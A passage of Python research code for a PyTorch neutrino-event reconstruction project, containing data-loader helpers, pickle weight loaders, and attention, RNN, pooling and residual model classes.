'None'))+'/'\n if file_keys['transform'] == -1:\n prefix = 'raw/'\n ### Deprecated stuff ###\n # if 'LstmLoader' == data_pars['dataloader']:\n # dataloader = LstmLoader(data_dir, file_keys, targets, scalar_features, seq_features, keyword, train_frac, val_frac, test_frac)\n # elif 'SeqScalarTargetLoader' == data_pars['dataloader']:\n # prefix = 'transform'+str(file_keys['transform'])+'/'\n # dataloader = SeqScalarTargetLoader(data_dir, seq_features, \n # scalar_features, targets, keyword, train_frac, \n # val_frac, test_frac, prefix=prefix)\n # elif 'FullBatchLoader' == data_pars['dataloader']:\n # dataloader = FullBatchLoader(data_dir, seq_features, scalar_features, \n # targets, keyword, train_frac, val_frac, test_frac,\n # batch_size, prefix=prefix, n_events_wanted=n_events_wanted,\n # particle_code=particle_code, file_list=file_list, \n # mask_name=mask_name, drop_last=drop_last, \n # debug_mode=debug_mode)\n # elif 'PickleLoader' == data_pars['dataloader']:\n # prefix = 'transform'+str(file_keys['transform'])\n # if file_keys['transform'] == -1:\n # prefix = 'raw'\n # dataloader = PickleLoader(data_dir, seq_features, scalar_features, \n # targets, keyword, train_frac, val_frac, \n # test_frac, prefix=prefix, n_events_wanted=n_events_wanted, \n # masks=mask_names, weights=weights,\n # dom_mask=dom_mask, max_seq_len=max_seq_len\n # )\n if 'SqliteLoader' == data_pars['dataloader']:\n dataloader = SqliteLoader(\n data_dir, \n seq_features, \n scalar_features, \n targets, \n masks=mask_names, \n n_events_wanted=n_events_wanted, \n weights=weights, \n dom_mask=dom_mask, \n max_seq_len=max_seq_len, \n keyword=keyword,\n batch_size=batch_size,\n ensemble=ensemble, \n db_path=db_path,\n reg_type=regression\n )\n else:\n raise ValueError('Unknown data loader requested!')\n \n return dataloader\n \ndef load_predictions(data_pars, meta_pars, keyword, file, use_whole_file=False):\n\n cond1 = 'LstmLoader' == data_pars['dataloader']\n cond2 = 'SeqScalarTargetLoader' == data_pars['dataloader']\n cond3 = 'FullBatchLoader' == data_pars['dataloader']\n if cond1 or cond2 or cond3:\n \n seq_features = data_pars['seq_feat'] # feature names in sequences (if using LSTM-like network)\n scalar_features = data_pars['scalar_feat'] # feature names\n targets = get_target_keys(data_pars, meta_pars) # target names\n train_frac = data_pars['train_frac'] # how much data should be trained on?\n val_frac = data_pars['val_frac'] # how much data should be used for validation?\n test_frac = data_pars['test_frac'] # how much data should be used for training\n file_keys = data_pars['file_keys'] # which cleaning lvl and transform should be applied?\n mask_name = data_pars['mask']\n \n if use_whole_file:\n if keyword == 'train':\n train_frac = 1.0\n val_frac = 0.0\n test_frac = 0.0\n elif keyword == 'val':\n train_frac = 0.0\n val_frac = 1.0\n test_frac = 0.0\n elif keyword == 'test':\n train_frac = 0.0\n val_frac = 0.0\n test_frac = 1.0\n\n return LstmPredictLoader(file, file_keys, targets, scalar_features, seq_features, 'val', train_frac, val_frac, test_frac, mask_name=mask_name)\n \n else:\n raise ValueError('An unknown prediction loader was requested!')\n\ndef get_collate_fn(data_pars, mode='normal', permute_seq_features=[], permute_scalar_features=[], from_frac=0.0, to_frac=1.0):\n '''Returns requested collate-function, if the key 'collate_fn' is in the dictionary data_pars.\n '''\n\n if 'collate_fn' in data_pars:\n name = data_pars['collate_fn']\n if name == 'PadSequence':\n func = PadSequence(mode=mode, permute_seq_features=permute_seq_features, permute_scalar_features=permute_scalar_features,\n from_frac=from_frac,\n to_frac=to_frac)\n \n else:\n raise ValueError('Unknown collate-function requested!')\n else:\n func = None\n\n return func\n\ndef sort_indices(dataset, data_pars, dataloader_params=None):\n if 'collate_fn' in data_pars:\n collate_fn = data_pars['collate_fn']\n else: \n collate_fn = None\n\n if collate_fn == None:\n indices = dataset.indices\n \n # Since PadSequence sorts each batch wrt the longest sequence, the indices must be sorted aswell!\n elif collate_fn == 'PadSequence':\n batch_size = dataloader_params['batch_size']\n indices = dataset.indices\n n_indices = len(indices)\n\n for key in dataset.seq_features:\n seq = dataset.seq_features[key]\n break\n\n index_seq_pairs = [(indices[i], seq[i]) for i in range(n_indices)]\n \n if batch_size > n_indices:\n end = n_indices\n else:\n end = batch_size\n\n # While a whole batch is extracted, sort per batch\n while end <= n_indices:\n index_seq_pairs[end-batch_size:end] = sorted(index_seq_pairs[end-batch_size:end], key=lambda x: x[1].shape[0], reverse=True)\n \n end += batch_size\n \n # Sort remaining aswell\n index_seq_pairs[end-batch_size:-1] = sorted(index_seq_pairs[end-batch_size:-1], key=lambda x: x[1].shape[0], reverse=True)\n\n indices = [x[0] for x in index_seq_pairs]\n \n else:\n raise ValueError('Unknown sort function requested!')\n\n return indices\n\ndef load_pickle_weights(dataset, weights):\n \"\"\"Small function to load weights for a dataloader.\n \n Arguments:\n dataset {str} -- path to dataset\n weights {str} -- name of weights.\n \n Returns:\n array -- weights\n \"\"\" \n path = get_project_root()+get_path_from_root(dataset)+'/weights/'+weights+'.pickle'\n \n if weights == 'None':\n weights = [1]*get_n_tot_pickles(dataset)\n else:\n with open(path, 'rb') as f:\n weights = pickle.load(f)['weights']\n \n return np.array(weights)\n\ndef load_sqlite_weights(dataset, weights):\n \"\"\"Small function to load weights for a dataloader.\n\n Weights are loaded as a dictionary with event_id as keys and their \n corresponding weight\n \n Arguments:\n dataset {str} -- path to dataset\n weights {str} -- name of weights.\n \n Returns:\n dictionary -- dicitonary with weights for train, val. and test-db.\n \"\"\" \n path = '/'.join([PATH_DATA_OSCNEXT, 'weights', weights+'.pickle'])\n \n with open(path, 'rb') as f:\n weights = pickle.load(f)['weights']\n\n return weights\n\n# ======================================================================== \n# MODELS\n# ========================================================================\n\nclass Angle2Unitvector(nn.Module):\n \n def __init__(self):\n super(Angle2Unitvector, self).__init__()\n \n def forward(self, pred, device=None):\n\n # if not device:\n # raise ValueError('A device must be supplied!')\n \n x = torch.unsqueeze(\n torch.sin(pred[:, 0]) * torch.cos(pred[:, 1]), dim=1\n )\n y = torch.unsqueeze(\n torch.sin(pred[:, 0]) * torch.sin(pred[:, 1]), dim=1\n )\n z = torch.unsqueeze(\n torch.cos(pred[:, 0]), dim=1\n )\n \n out = torch.cat((x, y, z), dim=1)\n \n return out\n\nclass AveragePool(nn.Module):\n def __init__(self):\n \n super(AveragePool, self).__init__()\n self._batch_first = True\n # self.device = get_device()\n\n def forward(self, seq, lengths, device=None):\n # The max length is retrieved this way such that dataparallel works\n if self._batch_first:\n max_length = seq.shape[1]\n else:\n max_length = seq.shape[0]\n\n # A tensor of shape (batch_size, longest_seq, *) is expected and a list of len = batch_size and lengths[0] = longest_seq\n # Maxpooling is done over the second index\n mask = self._get_mask(lengths, max_length, batch_first=True, device=device)\n # By masking with 0, it is ensured that DOMs that are actually not there do not have an influence on the sum. By dividing with sequence length, we get the true mean\n seq = seq.masked_fill(~mask, 0.0)\n if self._batch_first:\n # (B, L, *) --> (B, *)\n seq = torch.sum(seq, dim=1)\n bs, feats = seq.shape\n # Some view-acrobatics due to broadcasting semantics.\n seq = (seq.view(feats, bs)/lengths).view(bs, feats)\n else:\n raise ValueError('Not sure when batch not first - AveragePool')\n\n return seq\n\n def _get_mask(self, lengths, maxlen, batch_first=False, device=None):\n # Assumes mask.size[S, B, *] or mask.size[B, S, *]\n if batch_first:\n # The 'None' is a placeholder so dimensions are matched.\n mask = torch.arange(maxlen, device=device)[None, :] < lengths[:, None]\n mask = mask.unsqueeze(2)\n return mask\n\nclass AttentionBlock(nn.Module):\n \"\"\"Implementation of Self Attention almost as described in 'Attention is All You Need'.\n \n (or https://jalammar.github.io/illustrated-transformer/) - calculates query-, key- and valuevectors, softmaxes a padded sequence and scales the dotproducts and returns weighted sum of values vectors.\n \n Can work both as a seq2seq encoder or as a seq2vec decoder - in this case, the key-matrix produces one key only.\n Returns:\n nn.Module -- A Self-attention layer \n \"\"\"\n def __init__(self, arch_dict, layer_dict, n_in, n_out, mode=None, intermediate=None):\n \n super(AttentionBlock, self).__init__()\n self.arch_dict = arch_dict\n self.layer_dict = layer_dict\n self.n_in = n_in\n self.n_out = n_out\n if intermediate:\n self._intermediate = intermediate\n else:\n self._intermediate = n_in\n self.n_out = n_out\n self._batch_first = True\n\n if mode == 'encoder':\n self.Q = nn.Linear(in_features=n_in, out_features=n_out)\n self.K = nn.Linear(in_features=n_in, out_features=n_out)\n self.V = nn.Linear(in_features=n_in, out_features=n_out)\n init_weights(arch_dict, arch_dict['nonlin'], self.Q)\n init_weights(arch_dict, arch_dict['nonlin'], self.K)\n init_weights(arch_dict, arch_dict['nonlin'], self.V)\n elif mode == 'decoder':\n raise ValueError('AttentionDecoder: Not implemented yet')\n self.Q = nn.Linear(in_features=n_in, out_features=n_out)\n self.K = nn.Linear(in_features=n_in, out_features=1)\n self.V = nn.Linear(in_features=n_in, out_features=n_out)\n init_weights(arch_dict, arch_dict['nonlin'], self.Q)\n init_weights(arch_dict, arch_dict['nonlin'], self.K)\n init_weights(arch_dict, arch_dict['nonlin'], self.V)\n\n self.softmax = nn.Softmax(dim=-1)\n if self.layer_dict.get('LayerNorm', False):\n self.norm = nn.LayerNorm(n_out)\n self.linear_out = nn.Linear(in_features=n_out, out_features=n_out)\n self.nonlin = add_non_lin(arch_dict, arch_dict['nonlin'])\n if self.layer_dict.get('LayerNorm', False):\n self.norm2 = nn.LayerNorm(n_out)\n if self.layer_dict.get('Residual', False):\n self.residual_connection = True\n \n \n def forward(self, seq, lengths, device=None):\n \n # The max length is retrieved this way such that dataparallel works\n if self._batch_first:\n max_length = seq.shape[1]\n else:\n max_length = seq.shape[0]\n\n q = self.Q(seq)\n k = self.K(seq)\n v = self.V(seq)\n \n # Attention -> potential norm and residual connection\n post_attention = self._calc_self_attention(q, k, v, lengths, max_length, batch_first=self._batch_first, device=device)\n if self.residual_connection and self.n_in == self.n_out:\n post_attention = seq + post_attention\n if self.norm:\n post_attention = self.norm(post_attention)\n \n # linear layer -> nonlin -> potential norm and residual connection\n output = self.nonlin(self.linear_out(post_attention))\n if self.residual_connection:\n output = output + post_attention\n if self.norm:\n output = self.norm2(output)\n \n return output\n\n def _calc_self_attention(self, q, k, v, lengths, max_length, batch_first=False, device=None):\n # The matrix multiplication is always done with using the last two dimensions, i.e. (*, 10, 11).(*, 11, 7) = (*, 10, 7) \n # The transpose means swap second to last and last dimension\n # masked_fill_ is in-place, masked_fill creates a new tensor\n weights = torch.matmul(q, k.transpose(-2, -1)) / sqrt(self.n_out)\n mask = self._get_mask(lengths, max_length, batch_first=batch_first, device=device)\n weights = weights.masked_fill(~mask, float('-inf'))\n weights = self.softmax(weights)\n \n # Calculate weighted sum of v-vectors.\n output = torch.matmul(weights, v)\n \n return output\n\n def _get_mask(self, lengths, maxlen, batch_first=False, device=None):\n # Assumes mask.size[S, B, *] or mask.size[B, S, *]\n if batch_first:\n mask = torch.arange(maxlen, device=device)[None, :] < lengths[:, None]\n mask = mask.unsqueeze(1)\n return mask\n\nclass AttentionBlock2(nn.Module):\n \"\"\"Implementation of Self Attention almost as described in 'Attention is All You Need'. Uses no value-vectors, but just the sequence itself. Furthermore, experimenting with only normalizing after nonlinearity.\n \n (or https://jalammar.github.io/illustrated-transformer/) - calculates query-, key- and valuevectors, softmaxes a padded sequence and scales the dotproducts and returns weighted sum of values vectors.\n \n Can work both as a seq2seq encoder or as a seq2vec decoder - in this case, the key-matrix produces one key only.\n Returns:\n nn.Module -- A Self-attention layer \n \"\"\"\n def __init__(self, arch_dict, layer_dict, n_in, n_out, batch_first=True):\n \n super(AttentionBlock2, self).__init__()\n self.arch_dict = arch_dict\n self.layer_dict = layer_dict\n self.n_in = n_in\n self.n_out = n_out\n self._batch_first = batch_first\n\n self.Q = nn.Linear(in_features=n_in, out_features=n_out)\n self.K = nn.Linear(in_features=n_in, out_features=n_out)\n init_weights(arch_dict, arch_dict['nonlin'], self.Q)\n init_weights(arch_dict, arch_dict['nonlin'], self.K)\n\n self.softmax = nn.Softmax(dim=-1)\n self.linear_out = nn.Linear(in_features=n_out, out_features=n_out)\n self.nonlin = add_non_lin(arch_dict, arch_dict['nonlin'])\n if self.layer_dict.get('LayerNorm', False):\n self.norm = nn.LayerNorm(n_out)\n if self.layer_dict.get('Residual', False):\n self.residual_connection = True\n \n \n def forward(self, seq, lengths, device=None):\n \n # The max length is retrieved this way such that dataparallel works\n if self._batch_first:\n max_length = seq.shape[1]\n else:\n max_length = seq.shape[0]\n\n q = self.Q(seq)\n k = self.K(seq)\n \n # Attention -> potential norm and residual connection\n post_attention = self._calc_self_attention(q, k, seq, lengths, max_length, batch_first=self._batch_first, device=device)\n \n # linear layer -> nonlin -> potential norm and residual connection\n output = self.nonlin(self.linear_out(post_attention))\n if self.residual_connection:\n output = output + post_attention\n if self.norm:\n output = self.norm(output)\n\n return output\n\n def _calc_self_attention(self, q, k, v, lengths, max_length, batch_first=False, device=None):\n # The matrix multiplication is always done with using the last two dimensions, i.e. (*, 10, 11).(*, 11, 7) = (*, 10, 7) \n # The transpose means swap second to last and last dimension\n # masked_fill_ is in-place, masked_fill creates a new tensor\n weights = torch.matmul(q, k.transpose(-2, -1)) / sqrt(self.n_out)\n mask = self._get_mask(lengths, max_length, batch_first=batch_first, device=device)\n weights = weights.masked_fill(~mask, float('-inf'))\n weights = self.softmax(weights)\n \n # Calculate weighted sum of v-vectors.\n output = torch.matmul(weights, v)\n \n return output\n\n def _get_mask(self, lengths, maxlen, batch_first=False, device=None):\n # Assumes mask.size[S, B, *] or mask.size[B, S, *]\n if batch_first:\n mask = torch.arange(maxlen, device=device)[None, :] < lengths[:, None]\n mask = mask.unsqueeze(1)\n return mask\n\nclass RnnBlock(nn.Module):\n \n def __init__(\n self, \n n_in, \n n_out, \n n_parallel, \n num_layers, \n rnn_type='LSTM', \n bidir=False, \n residual=False, \n batch_first=True, \n learn_init=False, \n dropout=0.0):\n \n super(RnnBlock, self).__init__()\n\n self._batch_first = batch_first\n self.hidden_size = n_out\n self.n_in = n_in\n self.residual = residual\n self.bidir = bidir\n self.n_dirs = 2 if bidir else 1\n self.n_layers = num_layers\n self.learn_init = learn_init\n self.dropout = dropout\n self.rnn_type = rnn_type\n self.par_RNNs = nn.ModuleList()\n if learn_init:\n self.init_hidden_states = nn.ParameterList()\n if rnn_type == 'LSTM':\n self.init_cell_states = nn.ParameterList()\n \n if rnn_type == 'LSTM':\n for i_par in range(n_parallel):\n self.par_RNNs.append(\n nn.LSTM(\n input_size=n_in, \n hidden_size=n_out, \n bidirectional=bidir, \n num_layers=num_layers, \n batch_first=batch_first, \n dropout=self.dropout\n )\n )\n if self.learn_init:\n n_parameters = self.n_dirs*self.hidden_size*self.n_layers\n self.init_hidden_states.append(nn.Parameter(torch.empty(n_parameters).normal_(mean=0,std=1.0)))\n self.init_cell_states.append(nn.Parameter(torch.empty(n_parameters).normal_(mean=0,std=1.0)))\n\n elif rnn_type == 'GRU':\n for i_par in range(n_parallel):\n self.par_RNNs.append(\n nn.GRU(\n input_size=n_in,\n hidden_size=n_out,\n bidirectional=bidir, \n num_layers=num_layers, \n batch_first=batch_first, \n dropout=self.dropout\n )\n )\n if self.learn_init:\n n_parameters = self.n_dirs*self.hidden_size*self.n_layers\n self.init_hidden_states.append(nn.Parameter(torch.empty(n_parameters).normal_(mean=0,std=1.0)))\n # self.init_cell_states.append(nn.Parameter(torch.empty(n_parameters).normal_(mean=0,std=1.0)))\n elif rnn_type == 'Vanilla':\n for i_par in range(n_parallel):\n self.par_RNNs.append(\n nn.RNN(\n input_size=n_in,\n hidden_size=n_out,\n bidirectional=bidir, \n num_layers=num_layers, \n batch_first=batch_first, \n dropout=self.dropout,\n )\n )\n if self.learn_init:\n n_parameters = self.n_dirs*self.hidden_size*self.n_layers\n self.init_hidden_states.append(nn.Parameter(torch.empty(n_parameters).normal_(mean=0,std=1.0)))\n \n else:\n raise KeyError('UNKNOWN RNN TYPE (%s) PASSED TO MAKEMODEL'%(rnn_type))\n \n def forward(self, seq, lengths, device=None):\n \n # The max length is retrieved this way such that dataparallel works\n if self._batch_first:\n longest_seq = seq.shape[1]\n batch_size = seq.shape[0]\n else:\n longest_seq = seq.shape[0]\n batch_size = seq.shape[1]\n\n # Send through LSTMs! Prep for first layer.\n seq_packed = pack(seq, lengths, batch_first=self._batch_first)\n \n # x is output - concatenate outputs of LSTMs in parallel\n for i_par in range(len(self.par_RNNs)):\n \n # Instantiate hidden and cell.\n # ? Maybe learn initial state?\n if self.learn_init:\n \n # GRUs and LSTMs require different initiations\n if self.rnn_type == 'LSTM':\n # ? Dont know why, but the .contiguous call is needed, else an error is thrown\n hidden = self.init_hidden_states[i_par].view(self.n_layers*self.n_dirs, 1, -1).expand(-1, batch_size, -1).contiguous()\n cell = self.init_cell_states[i_par].view(self.n_layers*self.n_dirs, 1, -1).expand(-1, batch_size, -1).contiguous()\n h = (hidden, cell)\n elif self.rnn_type in ['GRU', 'Vanilla']:\n h = self.init_hidden_states[i_par].view(self.n_layers*self.n_dirs, 1, -1).expand(-1, batch_size, -1).contiguous()\n\n else:\n h = self.init_hidden(batch_size, self.par_RNNs[i_par], device)\n\n # Send through LSTM\n self.par_RNNs[i_par].flatten_parameters()\n seq_par, h_par = self.par_RNNs[i_par](seq_packed, h)\n seq_par_post, lengths = unpack(seq_par, batch_first=True, total_length=longest_seq)\n\n # when multiple directions and layers, h_out is weird - needs careful treatment\n if self.rnn_type == 'LSTM':\n h_out = h_par[0].view(self.n_layers, self.n_dirs, batch_size, self.hidden_size)\n elif self.rnn_type in ['GRU', 'Vanilla']:\n h_out = h_par.view(self.n_layers, self.n_dirs, batch_size, self.hidden_size)\n \n if self.bidir:\n h_out = torch.cat((h_out[self.n_layers-1, 0, :, :], h_out[self.n_layers-1, 1, :, :]), axis=-1)\n else:\n h_out = h_out[self.n_layers-1, 0, :, :]#torch.cat((, h_out[self.n_layers-1, 1, :, :]), axis=-1)\n\n if self.residual:\n seq_par_post = seq_par_post + seq\n \n # Define x on first parallel LSTM-module\n if i_par == 0:\n x = h_out\n seq_out = seq_par_post\n\n # Now keep cat'ing for each parallel stack\n else:\n x = torch.cat((x, h_out), -1)\n seq_out = torch.cat((seq_out, seq_par_post), -1)\n \n return seq_out, x.squeeze(0)\n \n def init_hidden(self, batch_size, layer, device):\n hidden_size = int(layer.weight_ih_l0.shape[0]/4)\n\n # Initialize hidden and cell states - to either random nums or 0's\n # (num_layers * num_directions, batch, hidden_size)\n if self.rnn_type == 'LSTM':\n output = (torch.zeros(self.n_dirs*self.n_layers, batch_size, hidden_size, device=device), \n torch.zeros(self.n_dirs*self.n_layers, batch_size, hidden_size, device=device))\n elif self.rnn_type == 'GRU':\n output = torch.zeros(self.n_dirs*self.n_layers, batch_size, hidden_size, device=device)\n \n return output\n\nclass MakeModel(nn.Module):\n '''A modular PyTorch model builder\n '''\n\n def __init__(self, arch_dict, device):\n super(MakeModel, self).__init__()\n self.mods = make_model_architecture(arch_dict)\n self.layer_names = get_layer_names(arch_dict)\n self.arch_dict = arch_dict\n self.device = device\n self.count = 0\n\n # Input must be a tuple to be unpacked!\n def forward(self, batch):\n # Get device on each forward-pass to be compatible with training on multiple GPUs. An error is raised if no GPU available --> use except\n # try:\n # device = get_device(torch.cuda.current_device())\n # except AssertionError:\n # device = None\n\n # For linear layers\n if len(batch) == 1: \n x, = batch\n\n # For RNNs with additional scalar values\n if len(batch) == 3: \n seq, lengths, scalars = batch\n add_scalars = True \n batch_size = seq.shape[0]\n longest_seq = seq.shape[1]\n # 'Reshape' input (batch first), torch wants a certain form..\n # seq = seq.view(batch_size, -1, n_seq_vars)\n \n # Get device on each forward-pass to be compatible with training on multiple GPUs. An error is raised if no GPU available --> use excep\n device = 'cuda:'+str(seq.get_device())\n\n for layer_name, entry in zip(self.layer_names, self.mods):\n # Handle different layers in different ways! \n if layer_name == 'Linear':\n\n # If scalar variables are supplied for concatenation, do it! \n # But make sure to only do it once.\n if 'scalars' in locals(): \n if add_scalars: \n try:\n x, add_scalars = self.concat_scalars(x, scalars)\n # If x undefined, it means no sequential layers are in the model\n except UnboundLocalError:\n x = scalars\n add_scalars = False\n \n # Send through layers!\n x = entry(x)\n \n elif layer_name == 'Linear_embedder':\n seq = entry(seq)\n \n elif layer_name == 'AttentionEncoder':\n seq = entry(seq, lengths, device=device)\n \n elif layer_name == 'AttentionDecoder':\n x = entry(seq, lengths, device=device)\n \n # AttentionBlock2 is seq2seq\n elif layer_name == 'AttentionBlock2':\n seq = entry(seq, lengths, device=device)\n \n # Many to one! Therefore outputs x\n elif layer_name == 'ManyToOneAttention':\n x = entry(seq, lengths, device=device)\n # The MaxPool-layer is used after sequences have been treated \n # -> prepare for linear decoding.\n elif layer_name == 'MaxPool':\n x = entry(seq, lengths, device=device)\n \n # Same goes for average pool.\n elif layer_name == 'AveragePool':\n x = entry(seq, lengths, device=device)\n \n elif layer_name == 'LstmBlock':\n seq, x = entry(seq, lengths, device=device)\n \n elif layer_name == 'RnnBlock':\n seq, x = entry(seq, lengths, device=device)\n \n elif layer_name == 'BiLSTM':\n seq, x = entry(seq, lengths, device=device)\n \n elif layer_name == 'ResBlock':\n # If scalar variables are supplied for concatenation, do it! \n # But make sure to only do it once.\n if 'scalars' in locals(): \n if add_scalars: \n try:\n x, add_scalars = self.concat_scalars(x, scalars)\n # If x undefined, it means no sequential layers are in the model\n except UnboundLocalError:\n x = scalars\n add_scalars = False\n\n x = entry(x)\n \n elif layer_name == 'ResAttention':\n seq = entry(seq, lengths, device=device)\n \n elif layer_name == 'ResBlockSeq':\n seq = entry(seq)\n \n elif layer_name == 'Angle2Unitvector':\n x = entry(x, device=device)\n \n elif layer_name == 'SoftPlusSigma':\n x = entry(x, device=device)\n\n elif layer_name == 'Tanh':\n x = entry(x, device=device)\n\n else:\n raise ValueError('An unknown Module (%s) could not be processed.'%(layer_name))\n\n return x\n\n def init_hidden(self, batch_size, layer, device):\n hidden_size = int(layer.weight_ih_l0.shape[0]/4)\n if layer.bidirectional: num_dir = 2\n else: num_dir = 1\n\n # Initialize hidden and cell states - to either random nums or 0's\n # (num_layers * num_directions, batch, hidden_size)\n return (torch.zeros(num_dir, batch_size, hidden_size, device=device),\n torch.zeros(num_dir, batch_size, hidden_size, device=device))\n # return (torch.randn(num_dir, batch_size, hidden_size, device=device),\n # torch.randn(num_dir, batch_size, hidden_size, device=device))\n \n def concat_scalars(self, x, scalars):\n # x and scalars must be of shape (batch, features)\n return torch.cat((x, scalars), 1), False\n\nclass ManyToOneAttention(nn.Module):\n \"\"\"Implementation of Self Attention almost as described in 'Attention is All You Need'.\n \n (or https://jalammar.github.io/illustrated-transformer/) - calculates query-, key- and valuevectors, softmaxes a padded sequence and scales the dotproducts and returns weighted sum of values vectors.\n \n Can work both as a seq2seq encoder or as a seq2vec decoder - in this case, the key-matrix produces one key only.\n Returns:\n nn.Module -- A Self-attention layer \n \"\"\"\n def __init__(self, arch_dict, layer_dict, batch_first=True):\n \n super(ManyToOneAttention, self).__init__()\n self.arch_dict = arch_dict\n self.layer_dict = layer_dict\n self.n_in = layer_dict['n_in']\n self._batch_first = batch_first\n\n self.Q = nn.Linear(in_features=self.n_in, out_features=self.n_in)\n # We will only have one keyvector - this is the one we want to learn.\n # Instantiate with normally distributed numbers. The dotproduct of 2 vectors of dim N with normally distributed numbers will have a mean of 0 and variance of N. \n self.k = nn.Parameter(torch.empty(self.n_in).normal_(mean=0,std=1.0), requires_grad=True)\n init_weights(arch_dict, arch_dict['nonlin'], self.Q)\n\n self.softmax = nn.Softmax(dim=-1)\n \n \n def forward(self, seq, lengths, device=None):\n # The max length is retrieved this way such that dataparallel works\n if self._batch_first:\n max_length = seq.shape[1]\n else:\n max_length = seq.shape[0]\n\n # TODO: Make Q a nonlinear function i.e. some layers. \n q = self.Q(seq)\n \n # Attention -> potential norm and residual connection\n post_attention = self._calc_self_attention(\n q, \n seq, \n lengths, \n max_length, \n batch_first=self._batch_first, \n device=device\n )\n \n return post_attention.squeeze(1)\n\n def _calc_self_attention(self, q, v, lengths, max_length, batch_first=False, device=None):\n \n # The matrix multiplication is always done with using the last two dimensions, i.e. (*, 10, 11).(*, 11, 7) = (*, 10, 7) \n # The transpose means swap second to last and last dimension\n # masked_fill_ is in-place, masked_fill creates a new tensor\n \n # q: (B, L, F). k: (F, 1)\n weights = torch.matmul(q, self.k.view(self.n_in, -1)) / sqrt(self.n_in)\n mask = self._get_mask(lengths, max_length, batch_first=batch_first, device=device)\n \n # weights: (B, L, 1)\n weights = weights.squeeze(-1).masked_fill(~mask, float('-inf'))\n weights = self.softmax(weights)\n \n # Calculate weighted sum of v-vectors.\n shape = weights.shape\n # output becomes: (B, 1, F)\n output = torch.matmul(weights.view(shape[0], -1, shape[1]), v)\n \n return output\n\n def _get_mask(self, lengths, maxlen, batch_first=False, device=None):\n \n # Assumes mask.size[S, B, *] or mask.size[B, S, *]\n if batch_first:\n mask = torch.arange(maxlen, device=device)[None, :] < lengths[:, None]\n\n return mask\n\nclass MaxPool(nn.Module):\n def __init__(self):\n \n super(MaxPool, self).__init__()\n self._batch_first = True\n # self.device = get_device()\n\n def forward(self, seq, lengths, device=None):\n # The max length is retrieved this way such that dataparallel works\n if self._batch_first:\n max_length = seq.shape[1]\n else:\n max_length = seq.shape[0]\n\n # A tensor of shape (batch_size, longest_seq, *) is expected and a list of len = batch_size and lengths[0] = longest_seq\n # Maxpooling is done over the second index\n mask = self._get_mask(lengths, max_length, batch_first=True, device=device)\n # By masking with -inf, it is ensured that DOMs that are actually not there do not have an influence on the max pooling.\n seq = seq.masked_fill(~mask, float('-inf'))\n if self._batch_first:\n seq, _ = torch.max(seq, dim=1)\n else:\n raise ValueError('Not sure when batch not first - MaxPool')\n return seq\n\n def _get_mask(self, lengths, maxlen, batch_first=False, device=None):\n # Assumes mask.size[S, B, *] or mask.size[B, S, *]\n if batch_first:\n # The 'None' is a placeholder so dimensions are matched.\n mask = torch.arange(maxlen, device=device)[None, :] < lengths[:, None]\n mask = mask.unsqueeze(2)\n return mask\n\nclass Mish(nn.Module):\n \n def __init__(self):\n \n super(Mish, self).__init__()\n self._tanh = torch.nn.Tanh()\n self._softplus = torch.nn.Softplus()\n \n def forward(self, x):\n output = x * self._tanh(\n self._softplus(\n x\n )\n )\n return output\n\nclass NormNonlinWeight(nn.Module):\n\n def __init__(self, arch_dict, layer_dict, n_in, n_out, norm=None):\n super(NormNonlinWeight, self).__init__()\n self.norm = norm\n if self.norm:\n self.normalize = add_norm(arch_dict, layer_dict, n_in)\n self.nonlin = add_non_lin(arch_dict, layer_dict)\n self.linear = nn.Linear(in_features=n_in, out_features=n_out)\n \n def forward(self, x, device=None):\n if self.norm:\n output = self.linear(self.nonlin((self.normalize(x))))\n else:\n output = self.linear(self.nonlin(x))\n \n return output\n\nclass ResBlock(nn.Module):\n \"\"\"A Residual block as proposed in 'Identity Mappings in Deep Residual Networks'\n \"\"\" \n def __init__(self, arch_dict, layer_dict, n_in, n_out, norm=False):\n super(ResBlock, self).__init__()\n self.n_in = n_in\n self.n_out = n_out\n if n_in != n_out:\n self.linear0 = nn.Linear(in_features=n_in, out_features=n_out)\n\n if norm:\n self.norm1 = add_norm(arch_dict, layer_dict, n_out)\n self.non_lin1 = add_non_lin(arch_dict, arch_dict['nonlin'])\n self.linear1 = nn.Linear(in_features=n_out, out_features=n_out)\n init_weights(arch_dict, arch_dict['nonlin'], self.linear1)\n if norm:\n self.norm2 = add_norm(arch_dict, layer_dict, n_out)\n self.non_lin2 = add_non_lin(arch_dict, arch_dict['nonlin'])\n self.linear2 = nn.Linear(in_features=n_out, out_features=n_out)\n init_weights(arch_dict, arch_dict['nonlin'], self.linear2)\n\n def forward(self, seq, device=None):\n\n if self.n_in != self.n_out:\n seq = self.linear0(seq)\n \n res = self.linear1(self.non_lin1(self.norm1(seq)))\n res = self.linear2(self.non_lin2(self.norm2(res)))\n\n return seq+res\n\nclass ResAttention(nn.Module):\n \n def __init__(self, arch_dict, layer_dict, n_in, n_out, batch_first=True):\n super(ResAttention, self).__init__()\n self.n_in = n_in\n self.n_out = n_out\n self.n_layers = layer_dict['n_res_layers']\n self.norm = layer_dict.get('norm', False)\n\n if self.n_in != self.n_out:\n self.linear0 = nn.Linear(in_features=self.n_in, out_features=self.n_out)\n \n self.attention = SelfAttention(arch_dict, self.n_out, self.n_out, batch_first=batch_first)\n self.post_attntn = nn.Sequential(*[NormNonlinWeight(arch_dict, layer_dict, self.n_out, self.n_out, norm=self.norm) for i in range(self.n_layers)])\n \n def forward(self, seq, lengths, device=None):\n if self.n_in != self.n_out:\n seq = self.linear0(seq)\n post_attention = self.attention(seq, lengths, device=device)\n post_attention = self.post_attntn(post_attention)\n \n return seq+post_attention\n\nclass SelfAttention(nn.Module):\n \"\"\"Implementation of Self Attention almost as described in 'Attention is All You Need'. Uses no value-vectors, but just the sequence itself. Furthermore, experimenting with only normalizing after nonlinearity.\n \n (or https://jalammar.github.io/illustrated-transformer/) - calculates query-, key- and valuevectors, softmaxes a padded sequence and scales the dotproducts and returns weighted sum of values vectors.\n \n Can work both as a seq2seq encoder or as a seq2vec decoder - in this case, the key-matrix produces one key only.\n Returns:\n nn.Module -- A Self-attention layer \n \"\"\"\n def __init__(self, arch_dict, n_in, n_out, batch_first=True):\n super(SelfAttention, self).__init__()\n self.arch_dict = arch_dict\n self.n_in = n_in\n self.n_out = n_out\n self._batch_first = batch_first\n\n self.Q = nn.Linear(in_features=n_in, out_features=n_out)\n self.K = nn.Linear(in_features=n_in, out_features=n_out)\n init_weights(arch_dict, arch_dict['nonlin'], self.Q)\n init_weights(arch_dict, arch_dict['nonlin'], self.K)\n\n self.softmax = nn.Softmax(dim=-1)\n \n def forward(self, seq, lengths, device=None):\n \n # The max length is retrieved this way such that dataparallel works\n if self._batch_first:\n max_length = 